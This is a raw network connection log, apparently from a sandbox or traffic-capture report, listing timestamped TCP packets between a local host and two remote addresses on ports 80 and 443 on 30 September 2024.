                                                                            Sep 30, 2024 09:53:35.300910950 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.300921917 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.300931931 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.300946951 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.300946951 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.300956011 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.300975084 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.300987005 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301101923 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301112890 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301121950 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301131964 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301141977 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301145077 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301150084 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301163912 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301163912 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301173925 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301176071 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301184893 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301194906 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301204920 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301208973 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301208973 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301217079 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301219940 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301230907 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301234961 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301242113 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301251888 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301251888 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301260948 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301263094 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301275015 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301280022 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301295996 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301306963 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301315069 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301325083 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301335096 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301347017 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301353931 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301368952 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301389933 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301431894 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301445007 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301455975 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301465988 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301476002 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301482916 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301486969 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301496029 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301497936 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301508904 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301522970 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301553965 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301579952 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301587105 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301590919 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301600933 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301610947 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301616907 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301621914 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301630020 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301632881 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301642895 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301661968 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301683903 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301738977 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301749945 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301759005 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301769972 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301775932 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301785946 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301785946 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301796913 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301799059 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301806927 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301810980 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301825047 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301835060 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301887035 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301898003 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301908016 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301918030 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301925898 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301928997 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301940918 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.301944017 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301960945 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.301970005 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302031994 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302042007 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302052975 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302069902 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302076101 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302082062 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302088976 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302097082 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302108049 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302108049 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302119970 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302120924 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302134037 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302145958 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302227020 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302237988 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302247047 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302257061 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302267075 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302275896 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302277088 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302284002 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302289009 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302299023 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302301884 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302309990 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302314997 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302331924 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302345037 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302361965 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302372932 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302382946 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302397013 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302406073 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302416086 CEST4916780192.168.2.22192.3.220.22
                                                                            Sep 30, 2024 09:53:35.302432060 CEST8049167192.3.220.22192.168.2.22
                                                                            Sep 30, 2024 09:53:35.302443981 CEST8049167192.3.220.22192.168.2.22
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Sep 30, 2024 09:53:35.302453995 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302464008 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302467108 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302474022 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302475929 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302484989 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302495003 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302505970 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302520037 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302586079 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302602053 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302613974 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302622080 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302638054 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302649021 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302664995 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302675962 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302686930 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302696943 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302697897 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302709103 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302726030 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302843094 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302854061 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302864075 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302875042 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302886009 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302891970 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302896023 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302903891 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302908897 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302913904 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302947044 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302956104 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302958012 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302968025 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302978992 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302989006 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.302994967 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302994967 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.302999973 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.303004026 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.303011894 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.303020000 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.303039074 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.303049088 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.303050995 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.303059101 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.303070068 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.303083897 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.303097963 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:35.388181925 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.388199091 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.388211012 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:35.388284922 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:39.508779049 CEST  80           49167      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:39.508882046 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:43.564683914 CEST  49168        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:43.564727068 CEST  443          49168      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:43.564825058 CEST  49168        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:43.565063000 CEST  49168        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:43.565077066 CEST  443          49168      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:44.025895119 CEST  443          49168      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:44.026022911 CEST  49168        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:44.027451992 CEST  49168        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:44.027462006 CEST  443          49168      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:44.032460928 CEST  49168        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:44.032465935 CEST  443          49168      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:44.845232964 CEST  443          49168      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:44.845294952 CEST  49168        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:44.845308065 CEST  443          49168      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:44.845347881 CEST  49168        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:44.845747948 CEST  49168        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:44.845763922 CEST  443          49168      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:47.083890915 CEST  49169        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:47.083939075 CEST  443          49169      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:47.083992958 CEST  49169        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:47.092753887 CEST  49170        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:47.092763901 CEST  443          49170      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:47.092813015 CEST  49170        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:47.100307941 CEST  49171        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:47.105216980 CEST  80           49171      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:47.105278015 CEST  49171        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:47.369509935 CEST  49170        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:47.369538069 CEST  443          49170      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:47.444474936 CEST  49169        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:47.444500923 CEST  443          49169      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:47.830732107 CEST  443          49170      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:47.830806017 CEST  49170        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:47.835563898 CEST  49170        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:47.835572004 CEST  443          49170      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:47.835865974 CEST  443          49170      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:47.835910082 CEST  49170        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:47.902508974 CEST  443          49169      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:47.902591944 CEST  49169        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:48.054207087 CEST  49169        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:48.054223061 CEST  443          49169      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:48.054629087 CEST  443          49169      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:48.054693937 CEST  49169        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:48.310926914 CEST  49169        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:48.351449013 CEST  443          49169      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:49.562509060 CEST  443          49169      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:49.562570095 CEST  49169        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:49.562587976 CEST  443          49169      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:49.562603951 CEST  443          49169      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:49.562640905 CEST  49169        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:49.562830925 CEST  49169        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:49.563885927 CEST  49169        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:53:49.563906908 CEST  443          49169      104.21.78.54   192.168.2.22
Sep 30, 2024 09:53:49.564893007 CEST  49171        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:49.565068960 CEST  49172        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:49.573848009 CEST  80           49172      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:49.573913097 CEST  49172        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:49.574035883 CEST  49172        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:49.574204922 CEST  80           49171      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:49.574299097 CEST  49171        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:49.580837965 CEST  80           49172      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:49.642018080 CEST  49167        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:50.060250044 CEST  80           49172      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:50.060314894 CEST  49172        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:55.070358992 CEST  80           49172      192.3.220.22   192.168.2.22
Sep 30, 2024 09:53:55.073546886 CEST  49172        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:56.363184929 CEST  49172        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:53:56.363255978 CEST  49170        443        192.168.2.22   104.21.78.54
Sep 30, 2024 09:56:14.196527004 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.201555014 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.201699018 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.202555895 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.207359076 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.719575882 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.719618082 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.719635963 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.719649076 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.719660044 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.719666004 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.719671011 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.719676018 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.719677925 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.719687939 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.719702959 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.719716072 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.719716072 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.719716072 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.719716072 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.719727039 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.719742060 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.720621109 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.724667072 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.724698067 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.724731922 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.724783897 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.724816084 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.724817038 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.806391001 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.806407928 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.806430101 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.806442022 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.806449890 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.806456089 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.806469917 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.806483030 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.806484938 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.806484938 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.806497097 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.806499004 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.806509018 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.806533098 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.806533098 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.807321072 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.807333946 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.807346106 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.807364941 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.807391882 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.807404041 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.807404041 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.807405949 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.807419062 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.807430029 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.807440042 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.807451010 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.808284998 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.808298111 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.808310986 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.808329105 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.808339119 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.808346987 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.808351994 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.808367014 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.808377981 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.808387041 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.808399916 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.808410883 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.809284925 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.809298992 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.809312105 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.809329033 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.809339046 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.809350014 CEST  49173        80         192.168.2.22   192.3.220.22
Sep 30, 2024 09:56:14.811244965 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.811261892 CEST  80           49173      192.3.220.22   192.168.2.22
Sep 30, 2024 09:56:14.811285973 CEST  49173        80         192.168.2.22   192.3.220.22
